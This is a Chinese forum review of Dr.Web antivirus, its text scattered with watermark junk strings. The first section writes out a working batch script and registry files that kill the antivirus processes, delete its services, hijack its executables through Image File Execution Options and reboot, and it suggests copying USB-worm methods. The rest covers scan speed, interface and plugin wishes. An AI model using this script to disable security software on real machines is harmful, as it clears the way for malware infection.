第一、关于自我保护——结论:不满意
( d! ?: B" M1 I% K2 W' W5 k! F
& }; u, N9 m/ u& I现在养成了习惯,每用一款杀软,都要先试试自我保护怎样,结果用xp自带的任务管理器就轻轻松松干掉了所有的进程:spidernt.exe 、spiderml.exe、 drwebscd.exe、spiderui.exe【见图】
福至交易论坛0 A" {" ^6 _! q( G
" \! L% `* x3 s' }4 |2 o; `bbs.123fz.net之后解压文件时不再报告,但是进入病毒所在文件夹时,仍会自动阻止访问病毒文件【见图】。因为后台还运行着spider.sys,只要再干掉它,就“今晚不设防了”。
* {3 F+ s) L1 Y# p/ @) `/ e) T$ T# A
, w( R$ W) E1 s4 |' o+ m$ D! x% p3 O: q! Q
9 Q& J4 T9 s- I8 W1 ]7 I+ z* D! a! Q# }) X) B% M2 t
哈哈,于是一个破坏思路就出来了:
# A/ w/ K# L: Z3 w$ Qbbs.123fz.net
) c. y( t0 s& G! d! X" ], C" a* e终止进程——删除注册表中的系统服务项or自启动项——搞破坏【映像劫持/在其安装目录下新建一个文件名为ws2_32.dll的文件/删除安装目录中的*.exe……】——重新启动
+ x% w& d; w1 K3 [$ R& @2 D7 u# h6 S% q9 a" A3 v
以下为我随便diy的一个破坏程序,把e盾放到学习模式,试验成功【放在同一目录下运行即可】
+ f5 W m) O7 t* d: J2 s* a2 j
福至交易论坛8 N6 B9 c1 y7 K1 Q# w% l
Test.bat: * U& R ]/ ?" z% h3 G8 j6 x7 n) g
taskkill /im spidernt.exe /f /t
福至交易论坛! k' s- F" T3 g5 J: e3 v6 f
taskkill /im spiderml.exe /f /t
- `1 D0 W& V ?4 s/ A! A; i3 wtaskkill /im drwebscd.exe /f /t
; o8 s2 F! o5 k# ^+ G7 ]" ?% v/ M
taskkill /im spiderui.exe /f /t
" k2 Q' V2 B9 w
regedit /s "del.reg"
bbs.123fz.net9 L1 ~: ^5 g2 D+ E Z: _# y6 U
regedit /s "ifeo.reg"
4 y; F2 j: y7 Q9 E c! W- jshutdown -r -t 1
bbs.123fz.net! g- }2 `2 X9 E
5 [0 }3 N9 Z; G6 }5 b4 x7 V7 x
del.reg:
* Y- i" e- o/ z( {福至交易论坛Windows Registry Editor Version 5.00
' i1 X( Q: r3 `0 g9 l! l R5 ]/ \# p( F8 ^! e9 O6 p9 U
[-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SPIDERNT]
. ]# z# f& B& Z% ~7 w$ K
9 Z+ P1 \6 ^9 x, f[-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SPIDER]
# s0 m3 ~* @$ |; q) E7 R9 {
5 w& l/ b& M. S) uIfeo.reg:
! c% u. @5 H4 C9 |' k0 [Windows Registry Editor Version 5.00
福至交易论坛* [) J% L5 v3 F% O
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spidernt.exe]
bbs.123fz.net* }, h' j. W" e3 l5 t5 X5 e
"Debugger"="IceSword.exe"
福至交易论坛0 N4 d z7 w5 y8 H$ ?
" M5 Y) V$ \- h; V[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spiderui.exe]
/ n t6 G7 F; w5 D& E
"Debugger"="IceSword.exe"
$ M+ p: V0 h+ d [
# R" `0 H) B7 Y+ ]( E% W[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\drwebscd.exe]
# K0 k( C% I( c( z4 h; H" t$ ]
"Debugger"="IceSword.exe"
( |" `& }) V4 [* E' j1 j福至交易论坛bbs.123fz.net9 X' ^! T' M8 Q' q7 G, _) `
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spiderml.exe]
8 f6 L+ X$ Z# t$ {"Debugger"="IceSword.exe"
福至交易论坛% H3 U$ N7 {# _. s- C
福至交易论坛4 d6 S! `3 h# [3 a) `3 W
还可以做成自解压格式的……
* o% y8 @& m+ }3 }3 Z1 [1 Q
福至交易论坛# L$ ?. U2 e. P3 O2 `
如果还要再恶心的破坏,建议你学学那些u盘病毒或者熊猫烧香等病毒的做法
* n$ D6 |8 a) t$ C+ J% ~. b
! j+ U/ x% a* ubbs.123fz.net建议:大蜘蛛应极力加强自我保护,不妨向那些流氓软件或者病毒木马学习!
+ k- y9 _. g& G% Q8 _
^1 p! n% N: r: i. K7 a+ |+ g8 n- g8 ^ L& A/ [! Y( }+ ]. z
7 [. F, N0 T, K第二.大蜘蛛的扫描速度超慢,希望在保证扫描质量的同时,提高速度。我们要效率啊!
0 u/ O' Q' p/ W F' b) v
% e. I* {2 ^1 K# E" ]- r偶的c盘空间占用3.3g,用大蜘蛛足足扫了一个钟头
& r9 c, s9 `" q+ ^Avk2006只用了30分钟,红伞20分钟左右
, E. V5 z# Y8 A& z
* `+ F6 u6 r1 p2 J! l$ J: D
第三.就是大蜘蛛的UI设计就像灰姑娘太俭朴了,整合不够【比如系统托盘出现了蜘蛛的3个图标,分别是实时监控、邮件监控、计划任务,完全可以集合到一个ui里,系统托盘也只保留一个图标】;细分不够,比如实时监控太笼统,而且不能根据自己的需要关闭部分监控。
& d6 e+ C0 v0 u0 q! h8 W福至交易论坛福至交易论坛, D Q+ [2 }+ M9 s
这一切在正在内测的5得到了极大地改进。见图:
& g8 [/ ]& j+ h4 @+ M7 A" x5 r* H
# a0 f! q/ r. r
/ l- T+ Y7 c: a, ^/ C- u下面就是幻想了
, W2 C- r8 A$ m# Q* C. Bbbs.123fz.netbbs.123fz.net& A4 |9 ?* } u, a; F
第四.希望为各主流浏览器添加插件,乃至增强网页安全探测功能
( \, f5 W3 F# N+ W【红色字体为我对蜘蛛了解不够,所下错误结论,9楼虫二指出官方已有插件了。偶很早用过firefox的,但是效果不满意,ie下的工作也不满意,有的挂马的干脆就出错提示。但是后面的则是我的期望】
0 f7 E* X8 ^9 L/ k Q' K+ q福至交易论坛
+ `) V9 ?& l/ U# \. Y) w# x福至交易论坛我们知道firefox里有个不错的小插件Dr.Web anti-virus link checker
4 p0 ?/ ^! c+ o3 e _
https://addons.mozilla.org/zh-CN/firefox/addon/938/
% q v: Z P* k3 ]: Y0 q2 j# I
3 a4 {/ O. f M; @这个插件可以让你将任何打算下载的文件或是任何想要访问的页面都先送到Dr.Web的在线扫描那儿扫一下…看看情况再说
, z; S6 F: P+ p. C, l/ J当然了这只是比较初级的,偶幻想如果可以软件结合官方在线分析系统进行网页安全探测,给出网页安全等级的话,那就爽了【偶的意思就是实现linkscanner探测分析以及利用freshow等工具解密网页木马的功能】蜘蛛并不需要做的过于细致,只需要探测网页框架中的js和iframe,跟踪解密到一定步骤,给出可疑等级即可。
